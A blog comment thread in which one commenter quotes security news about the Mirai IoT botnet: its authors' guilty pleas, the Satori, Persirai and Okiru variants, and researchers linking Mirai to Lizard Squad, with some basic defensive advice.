Meet Linux.Mirai Trojan, a DDoS nightmare


  1. Tomi Engdahl says:

    Three Plead Guilty in Mirai Botnet Attacks

    US officials unveiled criminal charges Wednesday against a former university student and two others in the Mirai botnet attacks which shut down parts of the internet in several countries starting in mid-2016.

    The Justice Department announced plea agreements for Paras Jha, 21 — a former Rutgers University computer science student who acknowledged writing the malware code — and Josiah White, 20, and Dalton Norman, 21, who helped profit from the attacks.

    In documents unsealed Wednesday, Jha admitted writing the code for the botnet which harnessed more than 100,000 “internet of things” (IoT) devices such as cameras, light bulbs and appliances to launch the attacks.

    By commanding an army of bots — or computers under control of the attackers — the malware shut down networks and websites in the United States, Germany, Liberia and elsewhere.

    The malware was used to make money through “click fraud,” a scheme that makes it appear that a real user has clicked on an advertisement for the purpose of artificially generating revenue, according to officials.

    The three generated some $180,000 from the scheme in bitcoin, Justice officials added.

  2. Tomi Engdahl says:

    Mirai-makers plead guilty, Hajime still lurks in shadows

    Riot doesn’t go in for New Year predictions much, but we think Hajime will be a name on most security reporters’ lips at some point in 2018 – a more potent version of the Mirai malware that threatens to run rampant across the Internet of Many Unsecured Things. Mirai itself has made the news this week, because its apparent author has now plead guilty to such accusations, leveled against him by the FBI. However, this isn’t the end for the now open-sourced Mirai.

  3. Tomi Engdahl says:

    Mirai Variant “Satori” Targets Huawei Routers

    Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.

    The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.

    Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

  4. Tomi Engdahl says:

    From Mirai To Persirai — The Metamorphosis Of An Open Source Botnet

    The Mirai malware has become particularly notorious for recruiting IoT devices to form botnets that have launched some of the largest DDoS attacks ever recorded. Mirai came onto the scene in late 2016 as the malware supporting very large DDoS attacks, including a 650 Mbps attack on the Krebs on Security site. It’s also purported to have been the basis of the attack in October 2016 that brought down sites including Twitter, Netflix, Airbnb and many others. Since then, Mirai has morphed into the most aggressive and effective botnet tool we’ve seen to date.

    The Rise of Persirai

    This brings us to Persirai, the newest version of Mirai that was also discovered last month by researchers at Trend Micro and comes equipped with even more advanced “features.” Previous versions of Mirai used to rely on guessing default passwords, so any IoT devices that had default passwords changed were considered protected. Researchers discovered that Persirai became even more aggressive by exploiting a zero-day vulnerability to steal the password file from an IP camera regardless of password strength. Persirai’s ability to leverage the previous features, plus its password stealing capability has led to a massive increase in the number of infected devices. By tracking thousands of infected IoT devices, Trend Micro discovered over half of those in the U.S. are infected, with almost two-thirds of the cameras in Japan infected.

    Persirai is on an aggressive recruitment push.

    How to Avoid Being part of a Botnet

    Additional measures to ensure IoT devices do not become unwitting members of a Persirai botnet include blocking internet access to admin ports and disabling universal plug and play (UPnP) on the router or firewall. Also consider isolating IoT devices on your network using segmentation or firewall policies and only let IoT devices communicate with IP addresses that are approved. Finally, scan your network with our Mirai vulnerability scanner to see if it hosts a device vulnerable to Mirai injection attacks.

    Mirai Vulnerability Scanner

  5. Tomi Engdahl says:

    Mirai Variant Targets ARC CPU-Based Devices

    A newly discovered variant of the Mirai Internet of Things (IoT) botnet is targeting devices with ARC (Argonaut RISC Core) embedded processors, researchers warn.

    Dubbed Okiru, the new malware variant appears to be different from the Satori botnet, although the latter was also called Okiru by its author. Security researchers analyzing the new threat have discovered multiple differences between the two Mirai versions, aside from the targeting of the ARC architecture.

    Originally designed by ARC International, the ARC processors are 32-bit CPUs widely used in system on chip (SOC) devices for storage, home, mobile, automotive, and IoT applications. Each year, over 1.5 billion devices are shipped with ARC processors inside.

    Mirai Okiru represents the very first known malware targeting ARC processors, independent security researcher Odisseus, who analyzed the threat, notes.

    One of the characteristics that sets them apart is the configuration, which in Okiru is encrypted in two parts with telnet bombardment password encrypted. Satori doesn’t split it in two and doesn’t encrypt brute default passwords either. Moreover, the new malware variant can use up to 114 credentials for telnet attack, while Satori uses a different and shorter database.

    The researcher also explains that Okiru seems to lack the “TSource Engine Query” common Distributed “Reflective” (DRDoS) attack function via random UDP that Satori has.

  6. Tomi Engdahl says:

    Researchers Connect Lizard Squad to Mirai Botnet

    Lizard Squad and Mirai, which are responsible for a series of notorious distributed denial of service (DDoS) attacks, are connected to one another, a recent ZingBox report reveals.

    Lizard Squad is a hacking group known for some of the most highly publicized DDoS attacks in history, including the disruption of Sony PlayStation and Xbox Live networks. Over the past several years, multiple individuals suspected to have used Lizard Squad’s LizardStresser DDoS service have been arrested.

    While the hacking group has been operating for several years, Mirai has been around for only one year and a half, making headlines in late 2016 following massive DDoS attacks against Brian Krebs’ blog and Dyn’s DNS infrastructure. The malware’s source code was made public within weeks of these attacks and numerous variants have emerged since.

    Now, ZingBox researchers claim to have discovered evidence that links the Lizard Squad hackers and Mirai, including the common use of the same Ukraine hosting provider Blazingfast.

    The Mirai source code, the researchers point out, was released nine days after Lizard Squad founder Zachary Buchta was arrested. According to them, the DDoS attack on Brian Krebs’ blog in late 2016 appears the result of the journalist’s criticism against Lizard Squad, and there are also references to Mirai on a Lizard Squad website.


Leave a Comment

Your email address will not be published. Required fields are marked *